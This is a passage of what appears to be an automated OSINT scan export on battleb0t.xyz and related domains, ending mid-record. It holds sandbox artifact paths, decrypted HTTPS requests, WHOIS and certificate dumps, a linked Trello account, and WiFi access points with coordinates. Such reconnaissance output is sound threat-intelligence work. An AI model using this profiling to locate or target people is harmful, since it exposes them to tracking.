[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003868]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003868]\n "J660SMBF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J660SMBF.txt]- [targetUID: 00000000-00003868]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003868]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003576]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00003576]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /favicon/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: kamekititamiko.com\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_35.229.48.116]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 287\nContent-Type: application/octet-stream\nDate: Thu, 04 Aug 2022 00:25:17 GMT\nEtag: "e6405d573aba92769e697fd5ae94bc9b-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01G9K3W1TW651T5NWK91TD1HGM\n\n{\n "name": "",\n "short_name": "",\n "icons": [\n {\n "src": "/android-chrome-96x96.png",\n "sizes": "96x96",\n "type": "image/png"\n }\n ],\n "theme_color": "#ffffff",\n "background_color": "#ffffff",\n "display": "standalone"\n}"- [Source: SSL_35.229.48.116]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: kamekititamiko.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_35.229.48.116]\n\n "@}c%Av@^sp5xv=}K\n,]U+Dmr33I+\n\\;#s7o2&Tzo{]9k"- [Source: SSL_35.229.48.116]\n\n "ru:J{o#i@+)4BTi{o+[S"X=]4W*^!(*&\n75%v7$LF\nh"pW\'"z(V8!6Og\nZ6\'}9r[P4\'>h.\\\'Erfw\n{e9Gw)5{;!AZgi[<"- [Source: SSL_35.229.48.116]\n, " 8?~???y8?( @ `zv| {oTF&}*H~=858/AwL#3@_1*7IbeOG%a$|v&\n])RB!!-[?D&zHA\n4<O.mQ[\nh;_lrK/\'8m*AY/;nMY|?>( @W" ]@[e/Q&)*d"- [Source: SSL_35.229.48.116]\n, "DmNkK;/IwA"2#!dI!^Hz"5go1O\nyT>\'^xh)\ngc"- [Source: SSL_35.229.48.116]\n, "HTTP/ | 35.229.48.116 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.121 | 34.148.97.127 |
| 2023-05-12 02:44:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cloudflaressl.com | sni.cloudflaressl.com |
| 2023-05-12 02:44:21 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.108.153 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.77 | 34.74.170.74 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Trello (Category: social)
https://trello.com/ayhu | ayhu |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.157): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | registrar-abuse@cloudflare.com | Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2023-03-17T11:06:38Z
Creation Date: 2014-09-27T01:11:37Z
Registry Expiry Date: 2032-09-27T01:11:37Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARESSL.COM
Name Server: NS2.CLOUDFLARESSL.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 E6F95480B8B7B40CB784DEFF3DB68992C1A795554748DAB4CCE69FD298BD5F1F
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-25T07:00:34Z
Creation Date: 2014-09-27T01:11:37Z
Registrar Registration Expiration Date: 2032-09-27T01:11:37Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Name Server: ns1.cloudflaressl.com
Name Server: ns2.cloudflaressl.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 02:54:22 | HTTP Headers | No | Web Spider | 1 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:22 GMT", "content-type": "text/html"} | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:01:49 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.153:80 | 185.199.110.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ArcorWirelessLAN3mKh (Net ID: 00:01:E3:57:D5:DD) | 50.1188, 8.6843 |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:aa:7b:81:42:e7:bb:ef:b8:0c:29:95:16:51:5f:
17:ef:12:01:ea:12:d1:38:f6:d6:ab:de:90:73:55:
a4:af:cb:7c:f7:08:2e:7f:ec:c7:d3:07:5d:b2:f5:
bb:41:e9:04:92:a8:3c:a4:cb:ef:73:55:b5:a9:bc:
5c:d1:be:26:4b:99:f3:8a:57:d8:c7:77:79:1d:0e:
70:31:81:bc:da:4a:73:41:e5:08:81:59:46:c7:d8:
68:74:56:c2:f6:64:23:af:1b:88:8f:72:bd:52:09:
2e:97:9b:f1:a4:cf:09:d8:89:91:91:ca:2e:06:41:
a2:84:ad:0d:6a:df:00:95:f5:ec:e2:1e:49:48:18:
0a:3f:98:fa:06:a5:50:9f:7c:2c:20:19:c1:55:cd:
77:d2:89:47:dd:a9:ee:13:f6:2f:e2:48:87:26:a5:
fd:85:17:06:37:b0:a9:d0:53:b4:4d:e3:4c:ec:0e:
83:60:b2:ad:ad:2d:44:08:30:33:b0:91:f7:b0:f8:
00:7f:d1:49:37:39:19:99:a3:59:5c:dc:4a:a0:c5:
bd:ef:ae:e1:d6:c3:40:3c:f6:35:0e:db:7b:df:4f:
54:c4:bd:f6:3a:2c:2b:ff:c9:5b:e5:d2:e9:69:24:
02:0b:f7:c6:94:a2:a1:ed:73:64:15:f9:25:08:00:
3b:85
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E7:35:7E:35:FD:7B:BC:32:B5:C0:52:8C:76:D9:7D:F0:37:0A:7A:3D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/X4UdJFi-bqE
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QCTFvWRh6mE.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:9f:cd:b5:43:3b:6a:2f:1d:c9:3b:c0:c8:50:40:4b:85:6c:
a4:67:c0:ea:9c:ed:fa:82:03:5a:15:d9:da:e2:17:9e:f5:4d:
17:b3:27:61:b6:b3:76:a2:5c:3c:dc:1f:ca:d1:cf:2a:8c:c5:
9f:e1:42:b1:ce:4f:6c:8b:d7:5b:5d:4a:1a:37:bf:f7:48:1c:
b0:1e:50:fd:1f:d7:83:b8:62:23:8e:ce:bc:13:38:47:cd:3d:
85:a8:0c:e6:2b:35:45:86:97:06:88:96:8f:aa:84:6c:ae:91:
25:1d:3c:c7:d6:f8:a1:4f:51:5e:ed:a9:fe:6b:22:98:84:a4:
ef:b4:d3:2f:02:db:9e:b8:fb:29:cc:58:62:ad:6f:ac:48:dc:
16:46:0c:14:b4:34:7b:60:f1:ec:27:16:2b:4e:4a:c3:37:36:
d0:34:81:c1:2b:54:8c:d5:17:57:ba:55:4c:71:58:26:4f:c6:
22:b8:65:ba:ad:e7:f5:f2:a8:04:c1:7d:df:11:ab:7d:f5:94:
7d:56:64:8a:41:7f:f4:d3:d7:1a:a0:c6:cc:e6:42:c8:ac:de:
6a:33:c1:21:70:bc:bd:6f:69:08:1f:8f:fa:9f:b7:aa:ca:2e:
e6:b7:8f:15:ac:fb:89:0e:c0:5f:c0:b9:df:e8:c0:15:b9:87:
ca:00:58:c5
|
| 2023-05-12 02:59:45 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://cloudflare.com
Updated Date: 2023-03-07T02:18:07.0Z
Creation Date: 2022-03-31T20:18:56.0Z
Registry Expiry Date: 2024-03-31T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hamburg
Registrant Country: DE
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: PRANAB.NS.CLOUDFLARE.COM
Name Server: JOCELYN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-09T21:53:06Z
Creation Date: 2022-03-31T20:18:56Z
Registrar Registration Expiration Date: 2024-03-31T23:59:59Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Hamburg
Registrant Postal Code: DATA REDACTED
Registrant Country: DE
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Name Server: jocelyn.ns.cloudflare.com
Name Server: pranab.ns.cloudflare.com
DNSSEC: unsigned
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:45Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| tayhu.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f8c5eeb1a42bf-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6562 7451 (Net ID: 00:00:C5:D7:2F:EC) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:15 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': 